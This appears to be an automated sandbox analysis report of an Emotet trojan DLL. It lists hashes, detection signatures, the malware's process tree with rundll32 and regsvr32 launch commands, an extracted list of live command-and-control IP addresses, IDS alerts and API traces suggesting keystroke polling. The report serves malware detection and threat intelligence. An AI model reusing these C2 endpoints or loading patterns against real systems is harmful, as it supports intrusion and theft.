Windows Analysis Report
9818t9ks1s

Overview

General Information

Sample Name: 9818t9ks1s (renamed file extension from none to dll)
Analysis ID: 669370
MD5: 83418a9af56db91ff2c78c4b2b9d62f8
SHA1: 0ea68aab3721e509ce0b1bff7e574eda037798be
SHA256: 4a688f571024b08f9793559427d8692471f5aa715882899c631c3052eac7c6a1
Tags: 32, dll, exe, trojan

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Program does not show much activity (idle)
IP address seen in connection with other malware
PE file contains strange resources
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Registers a DLL
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6888 cmdline: loaddll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6896 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6924 cmdline: rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 6912 cmdline: regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che" MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 6932 cmdline: rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 7040 cmdline: rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllUnregisterServerr MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • svchost.exe (PID: 5084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6324 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6576 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7028 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
{"C2 list": ["51.91.7.5:8080", "197.242.150.244:8080", "1.234.2.232:8080", "173.212.193.249:8080", "51.91.76.89:8080", "151.106.112.196:8080", "107.182.225.142:8080", "103.43.46.182:443", "195.201.151.129:8080", "51.254.140.238:7080", "153.126.146.25:7080", "176.56.128.118:443", "188.44.20.25:443", "119.193.124.41:7080", "70.36.102.35:443", "45.142.114.231:8080", "46.55.222.11:443", "82.165.152.127:8080", "212.237.17.99:8080", "92.240.254.110:8080", "217.182.25.250:8080", "189.126.111.200:7080", "212.24.98.99:8080", "45.176.232.124:443", "192.99.251.50:443", "216.158.226.206:443", "206.188.212.92:8080", "176.104.106.96:8080", "159.65.88.10:8080", "138.185.72.26:8080", "203.114.109.124:443", "103.75.201.2:443", "1.234.21.73:7080", "209.126.98.206:8080", "50.30.40.196:8080", "209.250.246.206:443", "178.79.147.66:8080", "50.116.54.215:443", "185.8.212.130:7080", "31.24.158.56:8080", "146.59.226.45:443", "72.15.201.15:8080", "110.232.117.186:8080", "5.9.116.246:8080", "185.157.82.211:8080", "129.232.188.93:443", "158.69.222.101:443", "164.68.99.3:8080", "45.118.135.203:7080", "101.50.0.91:8080", "195.154.133.20:443", "196.218.30.83:443", "45.118.115.99:8080", "167.99.115.35:8080", "79.172.212.216:8080", "159.8.59.82:8080"]}
Source | Rule | Description | Author | Strings
00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Source | Rule | Description | Author | Strings
2.2.regsvr32.exe.49b0000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
2.2.regsvr32.exe.49b0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.4290000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
4.2.rundll32.exe.4290000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
5.2.regsvr32.exe.4c70000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
No Sigma rule has matched

Timestamp: 07/20/22-01:07:10.809694
Source IP: 192.168.2.5
Destination IP: 119.193.124.41
SID: 2404304
Source Port: 49822
Destination Port: 7080
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 07/20/22-01:07:08.508000
Source IP: 192.168.2.5
Destination IP: 51.91.76.89
SID: 2404338
Source Port: 49811
Destination Port: 8080
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: 9818t9ks1s.dll | Virustotal: Detection: 69%
Source: 9818t9ks1s.dll | Avira: detected
Source: https://70.36.102.35/v | Avira URL Cloud: Label: malware
Source: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdF | Avira URL Cloud: Label: malware
Source: https://70.36.102.35/ | Avira URL Cloud: Label: malware
Source: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdT | Avira URL Cloud: Label: malware
Source: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQd | Avira URL Cloud: Label: malware
Source: https://70.36.102.35/ | Virustotal: Detection: 13%
Source: 9818t9ks1s.dll | Joe Sandbox ML: detected
Source: 00000005.00000002.953841049.00000000032E6000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Emotet
Source: 9818t9ks1s.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 2_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,2_2_1002592C
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_1002592C __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,3_2_1002592C

Networking

Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 217.182.25.250 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 70.36.102.35 443
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 51.91.76.89 8080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 119.193.124.41 7080
Source: C:\Windows\SysWOW64\regsvr32.exe | Network Connect: 92.240.254.110 8080
Source: Traffic | Snort IDS: 2404338 ET CNC Feodo Tracker Reported CnC Server TCP group 20 192.168.2.5:49811 -> 51.91.76.89:8080
Source: Traffic | Snort IDS: 2404304 ET CNC Feodo Tracker Reported CnC Server TCP group 3 192.168.2.5:49822 -> 119.193.124.41:7080
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: Joe Sandbox View | ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Source: Joe Sandbox View | IP Address: 217.182.25.250 217.182.25.250
Source: global traffic | TCP traffic: 192.168.2.5:49770 -> 92.240.254.110:8080
Source: global traffic | TCP traffic: 192.168.2.5:49811 -> 51.91.76.89:8080
Source: global traffic | TCP traffic: 192.168.2.5:49817 -> 217.182.25.250:8080
Source: global traffic | TCP traffic: 192.168.2.5:49822 -> 119.193.124.41:7080
Source: unknown | Network traffic detected: IP country count 28
Source: unknown | Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown | TCP traffic detected without corresponding DNS query: 70.36.102.35
Source: unknown | TCP traffic detected without corresponding DNS query: 92.240.254.110
Source: unknown | TCP traffic detected without corresponding DNS query: 51.91.76.89
Source: unknown | TCP traffic detected without corresponding DNS query: 217.182.25.250
Source: unknown | TCP traffic detected without corresponding DNS query: 119.193.124.41
-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-07-11T16:37:37.4991749Z||.||58dfb4d5-be7e-424e-8739-cac99224843f||1152921505695035586||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                      Source: regsvr32.exe, 00000005.00000003.538445333.0000000003352000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.954006400.0000000003352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.836929466.0000019586090000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.684487522.000002554B900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000D.00000002.836929466.0000019586090000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.684378033.000002554AEEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 00000005.00000003.538445333.0000000003352000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.954006400.0000000003352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabQ
                      Source: regsvr32.exe, 00000005.00000003.538445333.0000000003352000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.954006400.0000000003352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en6
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 0000000D.00000002.836571481.00000195808AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.dmtf.o
                      Source: svchost.exe, 0000000D.00000002.836571481.00000195808AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/
                      Source: svchost.exe, 0000000D.00000002.836571481.00000195808AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeratio
                      Source: regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQd
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdF
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQdT
                      Source: regsvr32.exe, 00000005.00000003.481253554.000000000331E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://70.36.102.35/v
                      Source: regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110/
                      Source: regsvr32.exe, 00000005.00000003.526452741.000000000331E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110/6.102.35/gVsYreJaRCTZGAqrRgMzhhpqBeNQd
                      Source: regsvr32.exe, 00000005.00000002.953979215.0000000003347000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.538622366.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://92.240.254.110:8080/gECMlLDhVoiKFtzKjjRUPjlZHZhhxfpHLqiKeXIlMdFcRqaPxeg
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000018.00000003.650938728.000002554BE1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650909580.000002554B9B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651038741.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650818268.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650841411.000002554B9A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651011860.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650968671.000002554BE1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000018.00000003.654122875.000002554B9B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654040928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.654068801.000002554B9A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000018.00000003.650938728.000002554BE1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650909580.000002554B9B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651038741.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650818268.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650841411.000002554B9A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651011860.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650968671.000002554BE1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000018.00000003.650938728.000002554BE1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650909580.000002554B9B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651038741.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650818268.000002554B98F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650841411.000002554B9A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.651011860.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.650968671.000002554BE1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000018.00000003.659846928.000002554B991000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659413155.000002554BE18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659476166.000002554B9A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659437692.000002554BE02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000018.00000003.659235634.000002554B9A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,2_2_10032A2D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003437E GetKeyState,GetKeyState,GetKeyState,2_2_1003437E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,2_2_1002FE1B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003437E GetKeyState,GetKeyState,GetKeyState,3_2_1003437E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001D99B __EH_prolog,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,ScreenToClient,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,GetParent,3_2_1001D99B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_10032A2D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1002FE1B

                      E-Banking Fraud

                      Source: Yara matchFile source: 2.2.regsvr32.exe.49b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4c70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3110000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.42c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3110000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.49e0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.49b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.4d70000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.49f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4290000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.440856153.00000000049E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.438019180.00000000049F1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.440822056.00000000049B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.438281451.0000000004290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.954167693.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.438313364.00000000042C1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.954213063.0000000004D71000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.437810837.0000000003110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: 9818t9ks1s.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                      Source: C:\Windows\SysWOW64\regsvr32.exe File deleted: C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che:Zone.Identifier
                      Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Bvqee\
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001409B2_2_1001409B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100239732_2_10023973
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000DB7F2_2_1000DB7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001409B3_2_1001409B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100239733_2_10023973
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10010A0C3_2_10010A0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000DB7F3_2_1000DB7F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10011BF0 appears 53 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10012514 appears 39 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10011BF0 appears 118 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10012514 appears 47 times
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9818t9ks1s.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: 9818t9ks1s.dllVirustotal: Detection: 69%
                      Source: 9818t9ks1s.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll"
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\9818t9ks1s.dll
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9818t9ks1s.dll",#1
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllRegisterServer
                      Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bvqee\qeggfkimakwygr.che"
                      Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\9818t9ks1s.dll,DllUnregisterServerr
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@19/5@0/58
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10006120 FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,2_2_10006120
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_CURSOR
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_BITMAP
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_ICON
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_MENU
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_DIALOG
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_STRING
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_ACCELERATOR
                      Source: 9818t9ks1s.dllStatic PE information: section name: RT_GROUP_ICON
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 9818t9ks1s.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B34
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10010B20 push eax; ret 2_2_10010B5C
